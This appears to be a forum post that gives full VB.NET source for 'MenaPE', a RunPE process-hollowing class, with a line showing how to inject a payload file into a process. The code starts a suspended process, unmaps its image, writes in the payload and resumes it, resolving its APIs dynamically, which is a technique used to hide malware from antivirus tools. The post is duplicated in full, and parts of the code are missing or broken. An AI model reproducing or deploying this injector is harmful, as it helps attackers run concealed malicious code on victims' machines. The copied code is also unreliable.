01-18-2016, 03:28 AM
So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:
What I love about .NET is how we can manipulate with it in all kind of ways, due to the code is being JIT Compiled.
And this is kinda what this RunPE shows, normal RunPE’s can only do x86 -> x86 injections.
This RunPE can do ANY injection, yea even x86 -> x64 or x64 -> x86
Why? Well .NET is JIT Compiled, which means it isn’t really compiled yet when creating a .NET executeable,
a .NET executeable is like a wrapped executeable file with the instructions to how its gonna be JIT Compiled on run, so before its run we can manipulate just like we want with it.
Which means we can do RunPE Injections like x64 -> x86.
[spoiler]So, How do we go about using this code?
Class MenaPE
  'Title: MenaPE (RunPE Class)
  'Author: Menalix
  'Website: Menalix.com
  'Notice: For teaching purposes
#Region "Static API Calls"
  Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
  Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
#End Region
#Region "Dynamic API Caller"
  Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
    Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
  End Function
#End Region
#Region "Dynamic API's"
  Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
  ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")
  Private Delegate Function CreateProcessParameters( _
  ByVal ApplicationName As String, _
  ByVal CommandLine As String, _
  ByVal ProcessAttributes As IntPtr, _
  ByVal ThreadAttributes As IntPtr, _
  ByVal InheritHandles As Boolean, _
  ByVal CreationFlags As UInteger, _
  ByVal Environment As IntPtr, _
  ByVal CurrentDirectory As String, _
  ByRef StartupInfo As STARTUPINFO, _
  ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
  Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")
  Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
  ByVal ProcessInformationClass As Integer, _
  ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
  ByVal ProcessInformationLength As UInteger, _
  ByRef ReturnLength As UIntPtr) As UInteger
  ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")
  Private Delegate Function GetThreadContext64Parameters( _
  ByVal hThread As IntPtr, _
  ByRef lpContext As CONTEXT32) As Boolean
  Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing
  Private Delegate Function IsWow64ProcessParameters( _
  ByVal hProcess As IntPtr, _
  ByRef Wow64Process As Boolean) As Boolean
  ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")
  Private Delegate Function WriteProcessMemoryParameters( _
  ByVal hProcess As IntPtr, _
  ByVal lpBaseAddress As IntPtr, _
  ByVal lpBuffer As Byte(), _
  ByVal nSize As UInteger, _
  ByRef lpNumberOfBytesWritten As UInteger) As Boolean
  ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")
  Private Delegate Function NtUnmapViewOfSectionParameters( _
  ByVal hProcess As IntPtr, _
  ByVal pBaseAddress As IntPtr) As UInteger
  ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")
  Private Delegate Function VirtualAllocExParameters( _
  ByVal hProcess As IntPtr, _
  ByVal lpAddress As IntPtr, _
  ByVal dwSize As UInteger, _
  ByVal flAllocationType As UInteger, _
  ByVal flProtect As UInteger) As IntPtr
  ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")
  Private Delegate Function ResumeThreadParameters( _
  ByVal hThread As IntPtr) As UInteger
  ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")
#End Region
#Region "API Structures"
    Public hProcess As IntPtr
    Public hThread As IntPtr
    Public dwProcessId As UInteger
    Public dwThreadId As UInteger
  End Structure
  Private Structure STARTUPINFO
    Public cb As UInteger
    Public lpReserved As String
    Public lpDesktop As String
    Public lpTitle As String
    <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
    Public Misc As Byte()
    Public lpReserved2 As Byte
    Public hStdInput As IntPtr
    Public hStdOutput As IntPtr
    Public hStdError As IntPtr
  End Structure
    Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
    <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
    Dim State As UInteger
  End Structure
  Structure CONTEXT32
    Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
    Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
    <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
  End Structure
    Public ExitStatus As IntPtr
    Public PebBaseAddress As IntPtr
    Public AffinityMask As IntPtr
    Public BasePriority As IntPtr
    Public UniqueProcessID As IntPtr
    Public InheritedFromUniqueProcessId As IntPtr
  End Structure
#End Region
#Region "Injection"
  Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
    For I As Integer = 1 To 5
      If HandleRun(path, payload, creationflag) Then Return True
    Return False
  End Function
  Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
    Dim ReadWrite As Integer = Nothing
    Dim QuotedPath As String = String.Format("""{0}""", Path)
    SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data
      'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
      If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()
      'COMMENT: Defines some variables we need in the next process
      Dim RetLength As UInteger
      Dim Context = Nothing
      Dim PEBAddress32 As Integer = Nothing
      Dim PEBAddress64 As Int64 = Nothing
      Dim TargetIs64 As Boolean = Nothing
      Dim IsWow64Proc As Boolean = False
      IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
      If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
        Context = New CONTEXT32
        Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
        If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
          GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
          If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
          PEBAddress32 = Context.Ebx
          TargetIs64 = False
        Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here.Â
          NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
          PEBAddress32 = ProccessInfo.PebBaseAddress
          TargetIs64 = False
        End If
      Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here.Â
        NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
        PEBAddress64 = ProccessInfo.PebBaseAddress
        TargetIs64 = True
      End If
      Dim BaseAddress As IntPtr
      If TargetIs64 = True Then
        ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
        ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
      End If
      Dim PayloadIs64 As Boolean = False
      Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
      Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
      Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value
      If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
      Else : PayloadIs64 = False : End If
      If PayloadIs64 = False Then
        If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
          Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
        End If
      End If
      Dim dwImageBase As Integer
      If PayloadIs64 = True Then
        dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
        dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
      End If
      If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
        If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
      End If
      Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
      Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
      If dwNewImageBase = 0 Then Throw New Exception()
      Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
      If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target
      'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
      Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
      Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
      Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
      For I As Integer = 0 To NumberOfSections - 1
        Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
        Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
        Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
        If Not SizeOfRawData = 0 Then
          Dim SectionData(SizeOfRawData - 1) As Byte
          Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
          If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
        End If
        SectionOffset += &H28
      Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
      If TargetIs64 = True Then
        If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
        If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
      End If
      If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data
    Catch ex As Exception
      Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
      If P IsNot Nothing Then P.Kill()
      Return False
    End Try
    Return True
  End Function
#End Region
End Class
Dim MenaPEObject as New MenaPE
MenaPEObject.Run(Process.GetcurrentProcess.MainModule.FileName, IO.File.ReadAllBytes("Path you your payload"), &H10)
&H10 is a creation flag to show the payload's window, you can enable/disable as you please, here's some other creation flags that might come in handy:
So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:
What I love about .NET is how we can manipulate with it in all kind of ways, due to the code is being JIT Compiled.
And this is kinda what this RunPE shows, normal RunPE’s can only do x86 -> x86 injections.
This RunPE can do ANY injection, yea even x86 -> x64 or x64 -> x86
Why? Well .NET is JIT Compiled, which means it isn’t really compiled yet when creating a .NET executeable,
a .NET executeable is like a wrapped executeable file with the instructions to how its gonna be JIT Compiled on run, so before its run we can manipulate just like we want with it.
Which means we can do RunPE Injections like x64 -> x86.
[spoiler]So, How do we go about using this code?
Class MenaPE
  'Title: MenaPE (RunPE Class)
  'Author: Menalix
  'Website: Menalix.com
  'Notice: For teaching purposes
#Region "Static API Calls"
  Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr
  Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr
#End Region
#Region "Dynamic API Caller"
  Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T
    Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)
  End Function
#End Region
#Region "Dynamic API's"
  Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean
  ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")
  Private Delegate Function CreateProcessParameters( _
  ByVal ApplicationName As String, _
  ByVal CommandLine As String, _
  ByVal ProcessAttributes As IntPtr, _
  ByVal ThreadAttributes As IntPtr, _
  ByVal InheritHandles As Boolean, _
  ByVal CreationFlags As UInteger, _
  ByVal Environment As IntPtr, _
  ByVal CurrentDirectory As String, _
  ByRef StartupInfo As STARTUPINFO, _
  ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean
  Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")
  Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _
  ByVal ProcessInformationClass As Integer, _
  ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _
  ByVal ProcessInformationLength As UInteger, _
  ByRef ReturnLength As UIntPtr) As UInteger
  ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")
  Private Delegate Function GetThreadContext64Parameters( _
  ByVal hThread As IntPtr, _
  ByRef lpContext As CONTEXT32) As Boolean
  Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing
  Private Delegate Function IsWow64ProcessParameters( _
  ByVal hProcess As IntPtr, _
  ByRef Wow64Process As Boolean) As Boolean
  ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")
  Private Delegate Function WriteProcessMemoryParameters( _
  ByVal hProcess As IntPtr, _
  ByVal lpBaseAddress As IntPtr, _
  ByVal lpBuffer As Byte(), _
  ByVal nSize As UInteger, _
  ByRef lpNumberOfBytesWritten As UInteger) As Boolean
  ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")
  Private Delegate Function NtUnmapViewOfSectionParameters( _
  ByVal hProcess As IntPtr, _
  ByVal pBaseAddress As IntPtr) As UInteger
  ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")
  Private Delegate Function VirtualAllocExParameters( _
  ByVal hProcess As IntPtr, _
  ByVal lpAddress As IntPtr, _
  ByVal dwSize As UInteger, _
  ByVal flAllocationType As UInteger, _
  ByVal flProtect As UInteger) As IntPtr
  ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")
  Private Delegate Function ResumeThreadParameters( _
  ByVal hThread As IntPtr) As UInteger
  ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")
#End Region
#Region "API Structures"
    Public hProcess As IntPtr
    Public hThread As IntPtr
    Public dwProcessId As UInteger
    Public dwThreadId As UInteger
  End Structure
  Private Structure STARTUPINFO
    Public cb As UInteger
    Public lpReserved As String
    Public lpDesktop As String
    Public lpTitle As String
    <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _
    Public Misc As Byte()
    Public lpReserved2 As Byte
    Public hStdInput As IntPtr
    Public hStdOutput As IntPtr
    Public hStdError As IntPtr
  End Structure
    Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
    <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
    Dim State As UInteger
  End Structure
  Structure CONTEXT32
    Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger
    Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger
    <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()
  End Structure
    Public ExitStatus As IntPtr
    Public PebBaseAddress As IntPtr
    Public AffinityMask As IntPtr
    Public BasePriority As IntPtr
    Public UniqueProcessID As IntPtr
    Public InheritedFromUniqueProcessId As IntPtr
  End Structure
#End Region
#Region "Injection"
  Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
    For I As Integer = 1 To 5
      If HandleRun(path, payload, creationflag) Then Return True
    Return False
  End Function
  Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean
    Dim ReadWrite As Integer = Nothing
    Dim QuotedPath As String = String.Format("""{0}""", Path)
    SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data
      'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.
      If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()
      'COMMENT: Defines some variables we need in the next process
      Dim RetLength As UInteger
      Dim Context = Nothing
      Dim PEBAddress32 As Integer = Nothing
      Dim PEBAddress64 As Int64 = Nothing
      Dim TargetIs64 As Boolean = Nothing
      Dim IsWow64Proc As Boolean = False
      IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.
      If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit
        Context = New CONTEXT32
        Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.
        If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64
          GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
          If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception
          PEBAddress32 = Context.Ebx
          TargetIs64 = False
        Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here.Â
          NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
          PEBAddress32 = ProccessInfo.PebBaseAddress
          TargetIs64 = False
        End If
      Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here.Â
        NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload
        PEBAddress64 = ProccessInfo.PebBaseAddress
        TargetIs64 = True
      End If
      Dim BaseAddress As IntPtr
      If TargetIs64 = True Then
        ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts
        ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts
      End If
      Dim PayloadIs64 As Boolean = False
      Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address
      Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not
      Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value
      If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"
      Else : PayloadIs64 = False : End If
      If PayloadIs64 = False Then
        If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down
          Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection
        End If
      End If
      Dim dwImageBase As Integer
      If PayloadIs64 = True Then
        dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space
        dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space
      End If
      If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it
        If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it
      End If
      Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)
      Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it
      If dwNewImageBase = 0 Then Throw New Exception()
      Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)
      If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target
      'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData
      Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)
      Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)
      Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)
      For I As Integer = 0 To NumberOfSections - 1
        Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)
        Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)
        Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)
        If Not SizeOfRawData = 0 Then
          Dim SectionData(SizeOfRawData - 1) As Byte
          Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)
          If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
        End If
        SectionOffset += &H28
      Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)
      If TargetIs64 = True Then
        If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target
        If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target
      End If
      If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data
    Catch ex As Exception
      Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))
      If P IsNot Nothing Then P.Kill()
      Return False
    End Try
    Return True
  End Function
#End Region
End Class
Dim MenaPEObject as New MenaPE
MenaPEObject.Run(Process.GetcurrentProcess.MainModule.FileName, IO.File.ReadAllBytes("Path you your payload"), &H10)
&H10 is a creation flag to show the payload's window, you can enable/disable as you please, here's some other creation flags that might come in handy: